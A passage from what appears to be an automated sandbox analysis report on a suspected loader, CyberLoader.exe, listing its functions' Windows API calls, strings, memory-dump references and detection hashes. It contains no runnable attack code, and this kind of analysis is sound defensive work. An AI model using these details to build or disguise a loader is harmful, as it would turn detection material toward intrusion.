                                                    • Part of subcall function 002984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?), ref: 002984F4
                                                    • Part of subcall function 002984DE: GetLastError.KERNEL32(?,?,0029BFA7,?,00000000,?,00000000,?,0029BFCE,?,00000007,?,?,0029C3CB,?,?), ref: 00298506
                                                  • _free.LIBCMT ref: 0029BF3A
                                                  • _free.LIBCMT ref: 0029BF4C
                                                  • _free.LIBCMT ref: 0029BF5E
                                                  • _free.LIBCMT ref: 0029BF70
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 3eddf787cc3853de2f58f38f5b66c77795fda3419962f2e4f9e8988caff1e603
                                                  • Instruction ID: cb11b75247616613b973baa257681ffdd43edaa470c0647565b6c5c2b459c6ae
                                                  • Opcode Fuzzy Hash: 3eddf787cc3853de2f58f38f5b66c77795fda3419962f2e4f9e8988caff1e603
                                                  • Instruction Fuzzy Hash: DAF0FF32524606A78E21EF64FECAC1677DDBE0171076A5819F008D7D10DF20FC918E64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                  • IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                  • TranslateMessage.USER32(?), ref: 0028ACB8
                                                  • DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                  • String ID:
                                                  • API String ID: 1266772231-0
                                                  • Opcode ID: 0af14aba4c33da76d5699fae914593620d3b4d019e7b93447033ecb52586ec92
                                                  • Instruction ID: a8e89e6777d191e97c1a8ba6307ec74059b6c57125ec8a4799aa508df769a24d
                                                  • Opcode Fuzzy Hash: 0af14aba4c33da76d5699fae914593620d3b4d019e7b93447033ecb52586ec92
                                                  • Instruction Fuzzy Hash: 98F01D71D0312AEB9B20AFE2AC4CDEB7F6CEE252527408417F409D2150EA28D809C7B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002976BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\CyberLoader.exe,00000104), ref: 002976FD
                                                  • _free.LIBCMT ref: 002977C8
                                                  • _free.LIBCMT ref: 002977D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\AppData\Local\Temp\CyberLoader.exe
                                                  • API String ID: 2506810119-36896521
                                                  • Opcode ID: af6f2f54c3d5c590a32917642608b6f8668c64ec44dcaa775c773a48500bf679
                                                  • Instruction ID: ee7d1a2412b42a71a1d5ae8fda6b8250289b10ad3211c71b157e4a61e522dadc
                                                  • Opcode Fuzzy Hash: af6f2f54c3d5c590a32917642608b6f8668c64ec44dcaa775c773a48500bf679
                                                  • Instruction Fuzzy Hash: 8B316B71A25219BFDF21DF99EC859EEBBECEF85710B144066E80497611D6708E60CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00277574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00277579
                                                    • Part of subcall function 00273B3D: __EH_prolog.LIBCMT ref: 00273B42
                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00277640
                                                    • Part of subcall function 00277BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00277C04
                                                    • Part of subcall function 00277BF5: GetLastError.KERNEL32 ref: 00277C4A
                                                    • Part of subcall function 00277BF5: CloseHandle.KERNEL32(?), ref: 00277C59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                  • API String ID: 3813983858-639343689
                                                  • Opcode ID: 30319c0ec4b0c542acfdff30b6a01b7d4101a858ca66cecd320e53a733cadaea
                                                  • Instruction ID: 39707f324f4c8d31b83b74359bab74c0c542efaf3dc2c796589f189159a58b76
                                                  • Opcode Fuzzy Hash: 30319c0ec4b0c542acfdff30b6a01b7d4101a858ca66cecd320e53a733cadaea
                                                  • Instruction Fuzzy Hash: CA31E971924249AFDF11EF68DC85BFE7BBDAF15354F008055F448A7192CB704A64CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0027130B: GetDlgItem.USER32(00000000,00003021), ref: 0027134F
                                                    • Part of subcall function 0027130B: SetWindowTextW.USER32(00000000,002A35B4), ref: 00271365
                                                  • EndDialog.USER32(?,00000001), ref: 0028A4B8
                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0028A4CD
                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0028A4E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ItemText$DialogWindow
                                                  • String ID: ASKNEXTVOL
                                                  • API String ID: 445417207-3402441367
                                                  • Opcode ID: 6fdb66742016cf29a15d3460b5837a3be3ce4e877c76dd61bde9e4a68fd69133
                                                  • Instruction ID: 04d640c1b148134d84663d6decf93d3fffd363933267a99979f39b1a430de974
                                                  • Opcode Fuzzy Hash: 6fdb66742016cf29a15d3460b5837a3be3ce4e877c76dd61bde9e4a68fd69133
                                                  • Instruction Fuzzy Hash: E6119636666201AFEA21AF68AC4DF6A3769EB56700F104007F245970F1CBE19D35DB22
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: __fprintf_l_strncpy
                                                  • String ID: $%s$@%s
                                                  • API String ID: 1857242416-834177443
                                                  • Opcode ID: 5d81ea3338b86a17c48423bbd7fd0337b06818ebdf626bc6b9b6dd53b01a442c
                                                  • Instruction ID: 0ad57046bbd670f81bf936921d56080f5715cb828afaa1341b14d16396f1652d
                                                  • Opcode Fuzzy Hash: 5d81ea3338b86a17c48423bbd7fd0337b06818ebdf626bc6b9b6dd53b01a442c
                                                  • Instruction Fuzzy Hash: C4218172560209ABDF21DEA4CC06FEE7BB8AF05300F048512FE1896193D771EA669F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _swprintf.LIBCMT ref: 0027B51E
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • _wcschr.LIBVCRUNTIME ref: 0027B53C
                                                  • _wcschr.LIBVCRUNTIME ref: 0027B54C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                  • String ID: %c:\
                                                  • API String ID: 525462905-3142399695
                                                  • Opcode ID: fcb28b81d2470f7914f37ba1e565468033ec5e06c617864befd9dc7d5cb8bdcd
                                                  • Instruction ID: 9d2c1bf34a707530eec82798362a488cd081cdfdcaec0d2287c012667b2d0345
                                                  • Opcode Fuzzy Hash: fcb28b81d2470f7914f37ba1e565468033ec5e06c617864befd9dc7d5cb8bdcd
                                                  • Instruction Fuzzy Hash: 0D01FE539243137ACB32AF759C86E6BB7ACDE953607D18416F84DC6441FB30D570C6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 002806F3
                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 002806FD
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0027ABC5,00000008,?,00000000,?,0027CB88,?,00000000), ref: 0028070D
                                                  Strings
                                                  • Thread pool initialization failed., xrefs: 00280725
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                  • String ID: Thread pool initialization failed.
                                                  • API String ID: 3340455307-2182114853
                                                  • Opcode ID: 5d1944cca502cce049d3de3e913c26135fae502d7411ba4f48fd93683a9e126d
                                                  • Instruction ID: 8ff1160ed69f69925e9b76b67012d48a12a609a09fc1a6c604a0904a243a0a90
                                                  • Opcode Fuzzy Hash: 5d1944cca502cce049d3de3e913c26135fae502d7411ba4f48fd93683a9e126d
                                                  • Instruction Fuzzy Hash: AD11E3B5511709AFC3316F65D8C8AA7FBECEB95340F10482EF1DA82240DA716990CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                  • API String ID: 0-56093855
                                                  • Opcode ID: 6f4467b4a5c20003f4b5c79795ef404dc548c18fde95ca87b74dde1f043c7c43
                                                  • Instruction ID: 27264a53a991ce176c55179145db1dcff14f69ca8fea46930e56b70e5172cacd
                                                  • Opcode Fuzzy Hash: 6f4467b4a5c20003f4b5c79795ef404dc548c18fde95ca87b74dde1f043c7c43
                                                  • Instruction Fuzzy Hash: A701D879921246AFCB12AF14FC48E567BA9E715340F044532F405D22F0DAB1DC74EF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: __alldvrm$_strrchr
                                                  • String ID:
                                                  • API String ID: 1036877536-0
                                                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                  • Instruction ID: 925cb17c07a451f1ab39dba772239f28b994ca85f1e1d75bad5873a41cb9f0c5
                                                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                  • Instruction Fuzzy Hash: A3A149719243869FEF12CF5CC8917AEBBE5EF55320F1841ADE8459B281C2349D92CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002780B7,?,?,?), ref: 0027A351
                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002780B7,?,?), ref: 0027A395
                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002780B7,?,?,?,?,?,?,?,?), ref: 0027A416
                                                  • CloseHandle.KERNEL32(?,?,00000000,?,002780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0027A41D
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$Create$CloseHandleTime
                                                  • String ID:
                                                  • API String ID: 2287278272-0
                                                  • Opcode ID: 60b7e1a9067053138fef7d682ae7cabad014d3b59e57e39cfc79651baad4db3c
                                                  • Instruction ID: c162876b23df455bcdfb5ec4fe9d72ec5f05f099cb1629f3af91b750730959c5
                                                  • Opcode Fuzzy Hash: 60b7e1a9067053138fef7d682ae7cabad014d3b59e57e39cfc79651baad4db3c
                                                  • Instruction Fuzzy Hash: B341DF30258382AAE731DF24DC56BAFBBE8ABC1710F04895DB5D8931C1D6749A58DB13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002989AD,?,00000000,?,00000001,?,?,00000001,002989AD,?), ref: 0029C0E6
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029C16F
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002967E2,?), ref: 0029C181
                                                  • __freea.LIBCMT ref: 0029C18A
                                                    • Part of subcall function 00298518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0029C13D,00000000,?,002967E2,?,00000008,?,002989AD,?,?,?), ref: 0029854A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 26e33dc790cd3addd49bf03936e5b43b519f1b2c60b8cea88bb22daf1b1cce4b
                                                  • Instruction ID: 6a53a3992806e7b89768b97688e30b735fcccaaf1705c472d12759cdb8e6e835
                                                  • Opcode Fuzzy Hash: 26e33dc790cd3addd49bf03936e5b43b519f1b2c60b8cea88bb22daf1b1cce4b
                                                  • Instruction Fuzzy Hash: BF31EF72A2020AABDF24DF64DC45EAE7BA5EF45710F254168FC08D7291EB35CD64CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00289DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00289DBE
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00289DCD
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00289DDB
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00289DE9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  • Opcode ID: bac2c77c20dda80d277471486e98481ae95c49f8f11704ffccdc5815552e5998
                                                  • Instruction ID: 521e7d687f076cb3cdbbd2e09cf0aec051c7962243b87b19f013eba0b3f38788
                                                  • Opcode Fuzzy Hash: bac2c77c20dda80d277471486e98481ae95c49f8f11704ffccdc5815552e5998
                                                  • Instruction Fuzzy Hash: 77E0EC31D97622E7D3206FA4BC0DB9B3B68AB29713F054106F605961D4DA704849CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00292016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00292016
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0029201B
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00292020
                                                    • Part of subcall function 0029310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0029311F
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00292035
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                  • Instruction ID: 9ba1cc4dacbee3ad2f8a6be65296ca6c33a3f548ff9efa035284522e14648c59
                                                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                                                  • Instruction Fuzzy Hash: 1CC04824038642F41C22BEB232022BD2B440C72BD4B9270C2E88827113EE460A3EEC77
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00289F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00289DF1: GetDC.USER32(00000000), ref: 00289DF5
                                                    • Part of subcall function 00289DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00289E00
                                                    • Part of subcall function 00289DF1: ReleaseDC.USER32(00000000,00000000), ref: 00289E0B
